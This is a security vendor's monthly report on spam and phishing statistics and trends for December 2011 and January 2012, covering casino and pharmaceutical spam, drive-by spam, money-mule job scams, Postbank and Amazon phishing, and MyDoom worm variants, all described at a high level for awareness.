Spam Levels

After spam levels reached a new peak in November 2011 since the takedown of the world’s largest botnet, Rustock, on March 16, 2011, they then declined to their lowest value since early 2007 in December 2011. In December, spam levels decreased by 70.3% only to then undergo a slight increase of 9.7% in January, putting them at 61.2% below the same month’s value as compared to the previous year.

Those events marked the continuation of an extremely inconsistent spam trend that characterized 2011. Spam volumes have never fluctuated to such a great degree since eleven began monitoring spam in 2003. Spam levels rose and fell by significantly more than 50%, such as in January 2011 following a massive decline the month before and, most recently, during a decline last December. The most important event was the Rustock botnet takedown in March 2011, the consequence of which was that spam volumes declined by more than 60% within a few hours. Even the renewed increase in August occurred within a short period of time. The sending pattern for spam also changed: casino spam, which dominated the second half of the year, was sent in short, yet massive, waves. Spam levels briefly increased several times over, only to then decline just as rapidly.

As a consequence of the drop in spam, the percentage of spam of all e-mail volume fell from 90.25% to 74.8% between November and December 2011. That percentage was 75.1% in January. The percentage of “clean” e-mails was 17.0% in January, legitimate bulk e-mails (such as newsletters) comprised 5.7%, and malware e-mail accounted for a 0.2% share.

The main culprit behind the massive decline in spam was casino e-mail, which as also the cause for the renewed spam growth since August 2011. The last major waves appeared in late November 2011; since then, larger casino e-mails have stagnated. Longer periods of time between casino spam waves have always been a normal occurrence, but have never lasted for more than two weeks. At the same time, the spam decline is reminiscent of last year’s trends: spam volumes fell to about one fourth in mid-December, only to return to their starting value in mid-January. It still remains to be seen whether the current break will follow the same pattern, even though it has already lasted longer.

Spam Topics

Advertising e-mails for online casinos, which have dominated the spam landscape since May 2011, experienced a significant decline in December and January. Although they comprised 69.1% of all spam messages in November 2011, their share was only 7.5% by January 2012. That took casino spam from first to fourth place in the list of most important spam topics. The most prevalent spam topic was pharmaceuticals with 26.0%, a long-term frontrunner and number once for the first time since May 2011. That percentage, though, is still considerably lower than the value prior to the Rustock botnet shutdown: its share was still at 64% in the same period of the previous year.

The up-and-coming topic in December and January was fake luxury goods, which came in second with 23.2%; that percentage had been a meager 1.8% (fourth place) in November. Dating spam came in third with 8.1%, followed by online casinos and job offers (5.5%). Those subjects also significantly increased their shares from November, when they were only at 2.3%.

Countries of Origin

The decline in December also had a noticeable impact on the geographic distribution of spam e-mails. While India retained its top position with 11.7%, Brazil slipped from second to fifth place. In January, only 5.1% of all spam e-mail came from the South American country; the level had still been 11.2% as of November. The percentage of spam from Vietnam also decreased from fourth place (8.9%) to seventh (4.2%). The new runner-up was Indonesia with 7.9%, followed by Russia with 7.2%. The top ten list of spam is dominated by Asia and Eastern Europe: In the top ten, five Asian countries are next to four Eastern European countries. That dominance was interrupted only by Brazil.

By contrast, the share of spam from Western European industrial countries increased, which played a key role in the propagation of spam up to the Rustock takedown. The long-term frontrunner, the USA, came in eleventh in January with a share of 2.5% (November: 14th, 1.3%). In addition to Spain (15th, 2.9%), Germany once again appeared in the top 20. In November, Germany was in 30th place with 0.6%. The country came in 19th place in January 2012 with 1.3%, thereby more than doubling its share of overall spam volumes within two months.

Spam Trends

The most important – because it is the most dangerous – spam trend was what is known as drive-by spam. These are e-mails that automatically load malware onto a computer as soon as the e-mail is opened or shown in an e-mail program. They are written in HTML and contain a JavaScript that automatically loads malware onto the computer when the message is opened. Drive-by spam works similarly to drive-by downloads, in which Web sites are manipulated to infect computers with malware as soon as a page is opened in a browser. Drive-by spam makes it possible to avoid the additional detour via a link embedded in the e-mail or an attachment and even endangers vigilant e-mail users who do not open unknown attachments or click on any such links.

In order for drive-by spam to work, the e-mail program must be configured to display HTML contents and allow contents to be downloaded from the Internet. These functions have been turned off in the standard settings of the latest versions of popular e-mail clients such Microsoft Outlook or Thunderbird. However, users of older clients and several Web mail services are at a much higher risk. Caution should also be exercised when these contents are not displayed; the dangerous HTML document is then an e-mail attachment. If opened, the infection is executed via the Web browser. The trick isn’t entirely new, but was used on a larger scale for the first time in January when the percentage of drive-by spam increased by 1,225% as compared to December 2011. With a 0.2% share of all e-mail, it has reached a significant size.

The eleven research team observed significant professionalization in the case of job offers, which still mainly deal with the recruitment of so-called “money mules” for money laundering. Spammers have obviously recognized that an e-mail with a promise and a Web portal as a source address are no longer enough. A large number of allegedly valid domains were purchased but no content was placed on them; they were only used to establish e-mail addresses. A return address for the fictitious “Walter-Group.com” appears much more legitimate, of course, than application@hotmail.com.

The “money mules” are evidently more in demand than ever, for the scammers are doing everything to appear as real job brokers. In addition to a good income, the e-mails clearly state that the position offered does not violate German or EU laws. A particularly elaborate masquerade was discovered in January – with a slightly modified text, a job agency was looking for staff members. The ad sounds well-meaning, as always: “We are looking for a company representative in Germany and the Netherlands,” or “Personnel agency is looking for a manager for an English company in German,” salary starting at €1,500 per month for three hours of work a day. The response address is “…@smartsr.com.” When the Web site is loaded, it actually leads to a recruitment agency Web site. As is so often the case, the spammers have copied a large percentage of an original Web site. In this case, though, the spammers seem to have left out some minor details: a review as to whether the e-mail server accepts all specified e-mail addresses also led to some rejections.

Phishing

Phishing e-mails experienced explosive growth in December 2011 and January 2012; their rate increased by 194% in December and by a further 214% in January. The trend toward regionalized phishing campaigns continued, which targets German-speaking users, for instance. The eleven research team again observed numerous campaigns written in good German and which purported to come from regional companies such as banks. Phishers can thus achieve a considerably better “success rate” because the probability that a German user will open an alleged e-mail from a German bank, for example, is considerably higher than if the supposed sender is a foreign credit institution.

Postbank customers were once again the focus in January. This time, the phishing e-mail arrived without graphic elements, but with very direct instructions: “Click here to solve the problem.” That is because the account was “restricted.” The sender was, for example, sec@postank.de. The e-mail link leads to a Web site that features a copy of the Postbank log-in site (Postbank online banking) with a new log-in introduced in October 2011. As in many of these fraud cases, the page is foisted as a “normal” Web site. A majority of the Web site was again copied from the original site; only the entries and links directly beneath the entry fields were changed. When a user enters his account number and PIN, he is taken to another Web site. The layout of the second site is considerably less professional, but at least the Postbank colors are used. The user is asked to enter his last name, first name, birthday, and phone number.

The campaign reflects a series of current phishing trends – first, regionalization with regard to sender and language. When German e-mails are sent to German recipients in the name of the Postbank, the probability of reaching actual Postbank customers is relatively high. Second, the subject line creates a certain amount of pressure. Phishers like to work with allegedly blocked accounts to make recipients afraid, in the hope that fear will make them less careful and thus lead them to enter information where they otherwise wouldn’t. Third, a small mistake is often built in to the sending addresses (as with the missing “b” in “postank”) that the user often overlooks at first glance and thus thinks that the sender is legitimate.

Another trend is that the range of phishing campaign topics continues to expand. In addition to banks, phishers are also increasingly focusing on online services such as Amazon or Facebook. The eleven research team found one example in December 2011: The e-mails allege that the recipient’s Amazon account had been blocked due to unauthorized activity. To reactivate the account, recipients were asked to enter their credit card information on a Web site with a design that resembles that of Amazon, but which had, of course, been manipulated. Both the three-digit verification code and secure 3D code were requested, a combination that never occurs in real cases. The phishers’ goals include log-in data to e-mail accounts that can then be used for sending spam as well as Web hosting accounts. Spam and phishing sites can then be saved there.

Malware

Malware volumes increased by 8.0% in January 2012 and the emergence of unknown virus outbreaks by 6.5%. China was again the largest sender of known malware with 29.4%, followed by Bangladesh with 13.8% and spam frontrunner India with 10.1%. Germany is again one of the major sources of malware e-mails and came in seventh in January (3.1%). In terms of virus outbreaks, Italy came in first with 10.7%. The USA (7.5%) and Vietnam (6.3%) followed thereafter, and Germany came in eighth with 3.7%.

Whereas Trojans primarily dominated the malware landscape in 2011, versions of a long-known e-mail worm moved into the forefront at the turn of the year. Several modifications of the MyDoom worm accounted for some 65% of all virus e-mails in December 2011 and January 2012. MyDoom is part of the most widely distributed malware families. The first known version (MyDoom.A) appeared for the first time in 2004 and installed a back door in Windows systems, thus creating access to a system it can penetrate undetected to gain total control of all functions. Sending spam or reading keyboard entries are only two of many possibilities. The virus senders are now using the worm in a slightly modified form. First, damage routines are changed or adapted to security software; next, random modifications are made to deceive simple virus scanners. There have since been numerous developments. MyDoom.L, MyDoom.M, and MyDoom.O were among the most commonly disseminated viruses and worms in January.